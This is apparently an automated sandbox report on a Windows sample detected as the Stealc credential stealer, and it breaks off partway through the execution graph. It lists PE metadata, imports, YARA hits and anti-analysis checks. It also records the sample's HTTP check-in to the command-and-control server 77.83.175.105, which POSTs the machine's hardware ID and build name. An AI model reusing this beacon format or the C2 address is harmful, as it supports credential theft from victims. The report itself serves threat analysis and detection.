                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x91a3a0x91c00733162d59f51a63a0e7d0e82abd153baFalse0.8684119720197255data7.618486265802441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .data0x930000x1a2000x5c00da88833653b7c0fb3d509b66c726efe6False0.07965353260869565dBase III DBT, next free block index 75651550.9338507284032901IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0xae0000x23c9480x14a00b3408715885c276f2157ac9f32b490b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x2eb0000x16f60x1800ccde14f0896de3e04032d79354b5a4b3False0.3636067708333333data3.6188526439123714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          LIGENAZIMAFIFAPOGEDUCEDOD0xb8be80x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5953768844221106
                                          LIGENAZIMAFIFAPOGEDUCEDOD0xb8be80x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5953768844221106
                                          POJOKOLOSIVOF0xb9f580x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5835166256954328
                                          POJOKOLOSIVOF0xb9f580x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5835166256954328
                                          RAJENEWOWEZASUSARIJEJUWA0xb82000x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilIndia0.6055226824457594
                                          RAJENEWOWEZASUSARIJEJUWA0xb82000x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilSri Lanka0.6055226824457594
                                          RT_CURSOR0xbbde80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                          RT_CURSOR0xbcc900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                          RT_CURSOR0xbd5380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                          RT_CURSOR0xbdad00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                          RT_CURSOR0xbdc000xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                          RT_CURSOR0xbdcd80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                          RT_CURSOR0xbeb800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                          RT_CURSOR0xbf4280x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                          RT_CURSOR0xbf9c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                          RT_CURSOR0xc08680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                          RT_CURSOR0xc11100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                          RT_ICON0xae8c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5368663594470046
                                          RT_ICON0xae8c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5368663594470046
                                          RT_ICON0xaef880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.408298755186722
                                          RT_ICON0xaef880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.408298755186722
                                          RT_ICON0xb15300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.449468085106383
                                          RT_ICON0xb15300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.449468085106383
                                          RT_ICON0xb19c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.36220682302771856
                                          RT_ICON0xb19c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.36220682302771856
                                          RT_ICON0xb28700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.49954873646209386
                                          RT_ICON0xb28700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.49954873646209386
                                          RT_ICON0xb31180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5777649769585254
                                          RT_ICON0xb31180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5777649769585254
                                          RT_ICON0xb37e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6394508670520231
                                          RT_ICON0xb37e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6394508670520231
                                          RT_ICON0xb3d480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.44367219917012446
                                          RT_ICON0xb3d480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.44367219917012446
                                          RT_ICON0xb62f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.4526266416510319
                                          RT_ICON0xb62f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.4526266416510319
                                          RT_ICON0xb73980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4413934426229508
                                          RT_ICON0xb73980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4413934426229508
                                          RT_ICON0xb7d200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.49556737588652483
                                          RT_ICON0xb7d200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.49556737588652483
                                          RT_DIALOG0xc19000x58data0.8977272727272727
                                          RT_STRING0xc19580x396dataTamilIndia0.4553376906318083
                                          RT_STRING0xc19580x396dataTamilSri Lanka0.4553376906318083
                                          RT_STRING0xc1cf00x360dataTamilIndia0.4664351851851852
                                          RT_STRING0xc1cf00x360dataTamilSri Lanka0.4664351851851852
                                          RT_STRING0xc20500x5fadataTamilIndia0.43790849673202614
                                          RT_STRING0xc20500x5fadataTamilSri Lanka0.43790849673202614
                                          RT_STRING0xc26500x2f8dataTamilIndia0.4723684210526316
                                          RT_STRING0xc26500x2f8dataTamilSri Lanka0.4723684210526316
                                          RT_ACCELERATOR0xbbd900x58dataTamilIndia0.7954545454545454
                                          RT_ACCELERATOR0xbbd900x58dataTamilSri Lanka0.7954545454545454
                                          RT_GROUP_CURSOR0xbdaa00x30data0.9375
                                          RT_GROUP_CURSOR0xbdcb00x22data1.0588235294117647
                                          RT_GROUP_CURSOR0xbf9900x30data0.9375
                                          RT_GROUP_CURSOR0xc16780x30data0.9375
                                          RT_GROUP_ICON0xb19980x30dataTamilIndia0.9375
                                          RT_GROUP_ICON0xb19980x30dataTamilSri Lanka0.9375
                                          RT_GROUP_ICON0xb81880x76dataTamilIndia0.6694915254237288
                                          RT_GROUP_ICON0xb81880x76dataTamilSri Lanka0.6694915254237288
                                          RT_VERSION0xc16a80x258data0.5383333333333333
                                          DLLImport
                                          KERNEL32.dllInterlockedIncrement, InterlockedDecrement, GetCurrentProcess, CreateJobObjectW, WriteConsoleInputA, GetComputerNameW, GetTimeFormatA, CallNamedPipeW, FreeEnvironmentStringsA, GetTickCount, GetCommConfig, GetNumberFormatA, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsA, TlsSetValue, GetCurrencyFormatW, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, IsBadCodePtr, SetVolumeMountPointA, CreateProcessW, GetFileAttributesW, GetModuleFileNameW, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, GetDiskFreeSpaceW, LoadLibraryA, OpenJobObjectW, SetEnvironmentVariableA, GlobalWire, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, SetFileAttributesW, GetVersionExW, GetTempFileNameW, HeapAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, TerminateProcess, IsDebuggerPresent, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                          GDI32.dllGetCharWidth32A
                                          WINHTTP.dllWinHttpOpen
                                          Language of compilation systemCountry where language is spokenMap
                                          TamilIndia
                                          TamilSri Lanka
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-29T04:56:59.964831+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.44973077.83.175.10580TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 29, 2024 04:56:58.807454109 CET4973080192.168.2.477.83.175.105
                                          Oct 29, 2024 04:56:58.813025951 CET804973077.83.175.105192.168.2.4
                                          Oct 29, 2024 04:56:58.813117981 CET4973080192.168.2.477.83.175.105
                                          Oct 29, 2024 04:56:58.813502073 CET4973080192.168.2.477.83.175.105
                                          Oct 29, 2024 04:56:58.819067955 CET804973077.83.175.105192.168.2.4
                                          Oct 29, 2024 04:56:59.653760910 CET804973077.83.175.105192.168.2.4
                                          Oct 29, 2024 04:56:59.653846025 CET4973080192.168.2.477.83.175.105
                                          Oct 29, 2024 04:56:59.716830015 CET4973080192.168.2.477.83.175.105
                                          Oct 29, 2024 04:56:59.722368002 CET804973077.83.175.105192.168.2.4
                                          Oct 29, 2024 04:56:59.964745045 CET804973077.83.175.105192.168.2.4
                                          Oct 29, 2024 04:56:59.964831114 CET4973080192.168.2.477.83.175.105
                                          Oct 29, 2024 04:57:05.088120937 CET804973077.83.175.105192.168.2.4
                                          Oct 29, 2024 04:57:05.088200092 CET4973080192.168.2.477.83.175.105
                                          Oct 29, 2024 04:57:24.293833017 CET4973080192.168.2.477.83.175.105
                                          • 77.83.175.105
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44973077.83.175.105806720C:\Users\user\Desktop\8WOUWb5iEv.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 29, 2024 04:56:58.813502073 CET88OUTGET / HTTP/1.1
                                          Host: 77.83.175.105
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Oct 29, 2024 04:56:59.653760910 CET203INHTTP/1.1 200 OK
                                          Date: Tue, 29 Oct 2024 03:56:59 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Content-Length: 0
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Oct 29, 2024 04:56:59.716830015 CET417OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ
                                          Host: 77.83.175.105
                                          Content-Length: 217
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 38 31 41 36 42 35 46 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a
                                          Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="hwid"8A81A6B5F3762778904926------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build"LogsDiller------IDHDGIEHJJJJEBGDAFHJ--
                                          Oct 29, 2024 04:56:59.964745045 CET210INHTTP/1.1 200 OK
                                          Date: Tue, 29 Oct 2024 03:56:59 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Content-Length: 8
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                          Data Ascii: YmxvY2s=


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:23:56:56
                                          Start date:28/10/2024
                                          Path:C:\Users\user\Desktop\8WOUWb5iEv.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\8WOUWb5iEv.exe"
                                          Imagebase:0x400000
                                          File size:712'192 bytes
                                          MD5 hash:DBFB5A1FEE1DF3D86B1CDBA9E338B31D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:23:56:59
                                          Start date:28/10/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052
                                          Imagebase:0x60000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:3.6%
                                            Dynamic/Decrypted Code Coverage:68.7%
                                            Signature Coverage:14%
                                            Total number of Nodes:1365
                                            Total number of Limit Nodes:26
                                            execution_graph 44508 401190 44515 417a70 GetProcessHeap HeapAlloc GetComputerNameA 44508->44515 44510 40119e 44511 4011cc 44510->44511 44517 4179e0 GetProcessHeap HeapAlloc GetUserNameA 44510->44517 44513 4011b7 44513->44511 44514 4011c4 ExitProcess 44513->44514 44516 417ac9 44515->44516 44516->44510 44518 417a53 44517->44518 44518->44513 44519 416c90 44562 4022a0 44519->44562 44536 4179e0 3 API calls 44537 416cd0 44536->44537 44538 417a70 3 API calls 44537->44538 44539 416ce3 44538->44539 44695 41acc0 44539->44695 44541 416d04 44542 41acc0 4 API calls 44541->44542 44543 416d0b 44542->44543 44544 41acc0 4 API calls 44543->44544 44545 416d12 44544->44545 44546 41acc0 4 API calls 44545->44546 44547 416d19 44546->44547 44548 41acc0 4 API calls 44547->44548 44549 416d20 44548->44549 44703 41abb0 44549->44703 44551 416dac 44707 416bc0 GetSystemTime 44551->44707 44552 416d29 44552->44551 44554 416d62 OpenEventA 44552->44554 44556 416d95 CloseHandle Sleep 44554->44556 44557 416d79 44554->44557 44559 416daa 44556->44559 44561 416d81 CreateEventA 44557->44561 44559->44552 44560 416db6 CloseHandle ExitProcess 44561->44551 44904 404610 17 API calls 44562->44904 44564 4022b4 44565 404610 34 API calls 44564->44565 44566 4022cd 44565->44566 44567 404610 34 API calls 44566->44567 44568 4022e6 44567->44568 44569 404610 34 API calls 44568->44569 44570 4022ff 44569->44570 44571 404610 34 API calls 44570->44571 44572 402318 44571->44572 44573 404610 34 API calls 44572->44573 44574 402331 44573->44574 44575 404610 34 API calls 44574->44575 44576 40234a 44575->44576 44577 404610 34 API calls 44576->44577 44578 402363 44577->44578 44579 404610 34 API calls 44578->44579 44580 40237c 44579->44580 44581 404610 34 API calls 44580->44581 44582 402395 44581->44582 44583 404610 34 API calls 44582->44583 44584 4023ae 44583->44584 44585 404610 34 API calls 44584->44585 44586 4023c7 44585->44586 44587 404610 34 API calls 44586->44587 44588 4023e0 44587->44588 44589 404610 34 API calls 44588->44589 44590 4023f9 44589->44590 44591 404610 34 API calls 44590->44591 44592 402412 44591->44592 44593 404610 34 API calls 44592->44593 44594 40242b 44593->44594 44595 404610 34 API calls 44594->44595 44596 402444 44595->44596 44597 404610 34 API calls 44596->44597 44598 40245d 44597->44598 44599 404610 34 API calls 44598->44599 44600 402476 44599->44600 44601 404610 34 API calls 44600->44601 44602 40248f 44601->44602 44603 404610 34 API calls 44602->44603 44604 4024a8 44603->44604 44605 404610 34 API calls 44604->44605 44606 4024c1 44605->44606 44607 404610 34 API calls 44606->44607 44608 4024da 44607->44608 44609 404610 34 API calls 44608->44609 44610 4024f3 44609->44610 44611 404610 34 API calls 44610->44611 44612 40250c 44611->44612 44613 404610 34 API calls 44612->44613 44614 402525 44613->44614 44615 404610 34 API calls 44614->44615 44616 40253e 44615->44616 44617 404610 34 API calls 44616->44617 44618 402557 44617->44618 44619 404610 34 API calls 44618->44619 44620 402570 44619->44620 44621 404610 34 API calls 44620->44621 44622 402589 44621->44622 44623 404610 34 API calls 44622->44623 44624 4025a2 44623->44624 44625 404610 34 API calls 44624->44625 44626 4025bb 44625->44626 44627 404610 34 API calls 44626->44627 44628 4025d4 44627->44628 44629 404610 34 API calls 44628->44629 44630 4025ed 44629->44630 44631 404610 34 API calls 44630->44631 44632 402606 44631->44632 44633 404610 34 API calls 44632->44633 44634 40261f 44633->44634 44635 404610 34 API calls 44634->44635 44636 402638 44635->44636 44637 404610 34 API calls 44636->44637 44638 402651 44637->44638 44639 404610 34 API calls 44638->44639 44640 40266a 44639->44640 44641 404610 34 API calls 44640->44641 44642 402683 44641->44642 44643 404610 34 API calls 44642->44643 44644 40269c 44643->44644 44645 404610 34 API calls 44644->44645 44646 4026b5 44645->44646 44647 404610 34 API calls 44646->44647 44648 4026ce 44647->44648 44649 419bb0 44648->44649 44908 419aa0 GetPEB 44649->44908 44651 419bb8 44652 419de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 44651->44652 44653 419bca 44651->44653 44654 419e44 GetProcAddress 44652->44654 44655 419e5d 44652->44655 44658 419bdc 21 API calls 44653->44658 44654->44655 44656 419e96 44655->44656 44657 419e66 GetProcAddress GetProcAddress 44655->44657 44659 419eb8 44656->44659 44660 419e9f GetProcAddress 44656->44660 44657->44656 44658->44652 44661 419ec1 GetProcAddress 44659->44661 44662 419ed9 44659->44662 44660->44659 44661->44662 44663 416ca0 44662->44663 44664 419ee2 GetProcAddress GetProcAddress 44662->44664 44665 41aa50 44663->44665 44664->44663 44666 41aa60 44665->44666 44667 416cad 44666->44667 44668 41aa8e lstrcpy 44666->44668 44669 4011d0 44667->44669 44668->44667 44670 4011e8 44669->44670 44671 401217 44670->44671 44672 40120f ExitProcess 44670->44672 44673 401160 GetSystemInfo 44671->44673 44674 401184 44673->44674 44675 40117c ExitProcess 44673->44675 44676 401110 GetCurrentProcess VirtualAllocExNuma 44674->44676 44677 401141 ExitProcess 44676->44677 44678 401149 44676->44678 44909 4010a0 VirtualAlloc 44678->44909 44681 401220 44913 418b40 44681->44913 44684 401249 __aulldiv 44685 40129a 44684->44685 44686 401292 ExitProcess 44684->44686 44687 416a10 GetUserDefaultLangID 44685->44687 44688 416a73 GetUserDefaultLCID 44687->44688 44689 416a32 44687->44689 44688->44536 44689->44688 44690 416a61 ExitProcess 44689->44690 44691 416a43 ExitProcess 44689->44691 44692 416a57 ExitProcess 44689->44692 44693 416a6b ExitProcess 44689->44693 44694 416a4d ExitProcess 44689->44694 44693->44688 44915 41aa20 44695->44915 44697 41acd1 lstrlenA 44699 41acf0 44697->44699 44698 41ad28 44916 41aab0 44698->44916 44699->44698 44702 41ad0a lstrcpy lstrcatA 44699->44702 44701 41ad34 44701->44541 44702->44698 44704 41abcb 44703->44704 44705 41ac1b 44704->44705 44706 41ac09 lstrcpy 44704->44706 44705->44552 44706->44705 44920 416ac0 44707->44920 44709 416c2e 44710 416c38 sscanf 44709->44710 44949 41ab10 44710->44949 44712 416c4a SystemTimeToFileTime SystemTimeToFileTime 44713 416c80 44712->44713 44714 416c6e 44712->44714 44716 415d60 44713->44716 44714->44713 44715 416c78 ExitProcess 44714->44715 44717 415d6d 44716->44717 44718 41aa50 lstrcpy 44717->44718 44719 415d7e 44718->44719 44951 41ab30 lstrlenA 44719->44951 44722 41ab30 2 API calls 44723 415db4 44722->44723 44724 41ab30 2 API calls 44723->44724 44725 415dc4 44724->44725 44955 416680 44725->44955 44728 41ab30 2 API calls 44729 415de3 44728->44729 44730 41ab30 2 API calls 44729->44730 44731 415df0 44730->44731 44732 41ab30 2 API calls 44731->44732 44733 415dfd 44732->44733 44734 41ab30 2 API calls 44733->44734 44735 415e49 44734->44735 44964 4026f0 44735->44964 44743 415f13 44744 416680 lstrcpy 44743->44744 44745 415f25 44744->44745 44746 41aab0 lstrcpy 44745->44746 44747 415f42 44746->44747 44748 41acc0 4 API calls 44747->44748 44749 415f5a 44748->44749 44750 41abb0 lstrcpy 44749->44750 44751 415f66 44750->44751 44752 41acc0 4 API calls 44751->44752 44753 415f8a 44752->44753 44754 41abb0 lstrcpy 44753->44754 44755 415f96 44754->44755 44756 41acc0 4 API calls 44755->44756 44757 415fba 44756->44757 44758 41abb0 lstrcpy 44757->44758 44759 415fc6 44758->44759 44760 41aa50 lstrcpy 44759->44760 44761 415fee 44760->44761 45690 417690 GetWindowsDirectoryA 44761->45690 44764 41aab0 lstrcpy 44765 416008 44764->44765 45700 4048d0 44765->45700 44767 41600e 45845 4119f0 44767->45845 44769 416016 44770 41aa50 lstrcpy 44769->44770 44771 416039 44770->44771 44772 401590 lstrcpy 44771->44772 44773 41604d 44772->44773 45865 4059b0 39 API calls ctype 44773->45865 44775 416053 45866 411280 strtok_s strtok_s lstrlenA lstrcpy 44775->45866 44777 41605e 44778 41aa50 lstrcpy 44777->44778 44779 416082 44778->44779 44780 401590 lstrcpy 44779->44780 44781 416096 44780->44781 45867 4059b0 39 API calls ctype 44781->45867 44783 41609c 45868 410fc0 7 API calls 44783->45868 44785 4160a7 44786 41aa50 lstrcpy 44785->44786 44787 4160c9 44786->44787 44788 401590 lstrcpy 44787->44788 44789 4160dd 44788->44789 45869 4059b0 39 API calls ctype 44789->45869 44791 4160e3 45870 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 44791->45870 44793 4160ee 44794 401590 lstrcpy 44793->44794 44795 416105 44794->44795 45871 411c60 121 API calls 44795->45871 44797 41610a 44798 41aa50 lstrcpy 44797->44798 44799 416126 44798->44799 45872 405000 8 API calls 44799->45872 44801 41612b 44802 401590 lstrcpy 44801->44802 44803 4161ab 44802->44803 45873 4108a0 338 API calls 44803->45873 44805 4161b0 44806 41aa50 lstrcpy 44805->44806 44807 4161d6 44806->44807 44808 401590 lstrcpy 44807->44808 44809 4161ea 44808->44809 45874 4059b0 39 API calls ctype 44809->45874 44811 4161f0 45875 4113c0 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 44811->45875 44813 4161fb 44814 401590 lstrcpy 44813->44814 44815 41623b 44814->44815 45876 401ec0 67 API calls 44815->45876 44817 416240 44818 416250 44817->44818 44819 4162e2 44817->44819 44821 41aa50 lstrcpy 44818->44821 44820 41aab0 lstrcpy 44819->44820 44822 4162f5 44820->44822 44823 416270 44821->44823 44824 401590 lstrcpy 44822->44824 44825 401590 lstrcpy 44823->44825 44826 416309 44824->44826 44827 416284 44825->44827 45880 4059b0 39 API calls ctype 44826->45880 45877 4059b0 39 API calls ctype 44827->45877 44830 41630f 45881 4137b0 36 API calls 44830->45881 44831 41628a 45878 411520 21 API calls ctype 44831->45878 44834 416295 44836 401590 lstrcpy 44834->44836 44835 4162da 44838 41635b 44835->44838 44839 401590 lstrcpy 44835->44839 44837 4162d5 44836->44837 45879 414010 75 API calls 44837->45879 44841 416380 44838->44841 44843 401590 lstrcpy 44838->44843 44842 416337 44839->44842 44844 4163a5 44841->44844 44845 401590 lstrcpy 44841->44845 45882 414300 64 API calls ctype 44842->45882 44848 41637b 44843->44848 44847 4163ca 44844->44847 44851 401590 lstrcpy 44844->44851 44849 4163a0 44845->44849 44852 4163ef 44847->44852 44858 401590 lstrcpy 44847->44858 45884 4149d0 101 API calls ctype 44848->45884 45885 414e00 67 API calls ctype 44849->45885 44850 41633c 44856 401590 lstrcpy 44850->44856 44857 4163c5 44851->44857 44854 416414 44852->44854 44859 401590 lstrcpy 44852->44859 44861 416439 44854->44861 44866 401590 lstrcpy 44854->44866 44860 416356 44856->44860 45886 414fc0 75 API calls 44857->45886 44863 4163ea 44858->44863 44864 41640f 44859->44864 45883 415350 71 API calls 44860->45883 44867 416460 44861->44867 44873 401590 lstrcpy 44861->44873 45887 415190 69 API calls ctype 44863->45887 45888 407770 125 API calls ctype 44864->45888 44872 416434 44866->44872 44869 416470 44867->44869 44870 416503 44867->44870 44875 41aa50 lstrcpy 44869->44875 44874 41aab0 lstrcpy 44870->44874 45889 4152a0 67 API calls ctype 44872->45889 44877 416459 44873->44877 44879 416516 44874->44879 44880 416491 44875->44880 45890 4191a0 54 API calls ctype 44877->45890 44881 401590 lstrcpy 44879->44881 44882 401590 lstrcpy 44880->44882 44883 41652a 44881->44883 44884 4164a5 44882->44884 45894 4059b0 39 API calls ctype 44883->45894 45891 4059b0 39 API calls ctype 44884->45891 44887 416530 45895 4137b0 36 API calls 44887->45895 44888 4164ab 45892 411520 21 API calls ctype 44888->45892 44891 4164fb 44894 41aab0 lstrcpy 44891->44894 44892 4164b6 44893 401590 lstrcpy 44892->44893 44895 4164f6 44893->44895 44896 41654c 44894->44896 45893 414010 75 API calls 44895->45893 44898 401590 lstrcpy 44896->44898 44899 416560 44898->44899 45896 4059b0 39 API calls ctype 44899->45896 44901 41656c 44903 416588 44901->44903 45897 4168d0 9 API calls ctype 44901->45897 44903->44560 44905 4046e7 44904->44905 44906 4046fc 11 API calls 44905->44906 44907 40479f 6 API calls 44905->44907 44906->44905 44907->44564 44908->44651 44911 4010c2 ctype 44909->44911 44910 4010fd 44910->44681 44911->44910 44912 4010e2 VirtualFree 44911->44912 44912->44910 44914 401233 GlobalMemoryStatusEx 44913->44914 44914->44684 44915->44697 44917 41aad2 44916->44917 44918 41aafc 44917->44918 44919 41aaea lstrcpy 44917->44919 44918->44701 44919->44918 44921 41aa50 lstrcpy 44920->44921 44922 416ad3 44921->44922 44923 41acc0 4 API calls 44922->44923 44924 416ae5 44923->44924 44925 41abb0 lstrcpy 44924->44925 44926 416aee 44925->44926 44927 41acc0 4 API calls 44926->44927 44928 416b07 44927->44928 44929 41abb0 lstrcpy 44928->44929 44930 416b10 44929->44930 44931 41acc0 4 API calls 44930->44931 44932 416b2a 44931->44932 44933 41abb0 lstrcpy 44932->44933 44934 416b33 44933->44934 44935 41acc0 4 API calls 44934->44935 44936 416b4c 44935->44936 44937 41abb0 lstrcpy 44936->44937 44938 416b55 44937->44938 44939 41acc0 4 API calls 44938->44939 44940 416b6f 44939->44940 44941 41abb0 lstrcpy 44940->44941 44942 416b78 44941->44942 44943 41acc0 4 API calls 44942->44943 44944 416b93 44943->44944 44945 41abb0 lstrcpy 44944->44945 44946 416b9c 44945->44946 44947 41aab0 lstrcpy 44946->44947 44948 416bb0 44947->44948 44948->44709 44950 41ab22 44949->44950 44950->44712 44952 41ab4f 44951->44952 44953 415da4 44952->44953 44954 41ab8b lstrcpy 44952->44954 44953->44722 44954->44953 44956 41abb0 lstrcpy 44955->44956 44957 416693 44956->44957 44958 41abb0 lstrcpy 44957->44958 44959 4166a5 44958->44959 44960 41abb0 lstrcpy 44959->44960 44961 4166b7 44960->44961 44962 41abb0 lstrcpy 44961->44962 44963 415dd6 44962->44963 44963->44728 44965 404610 34 API calls 44964->44965 44966 402704 44965->44966 44967 404610 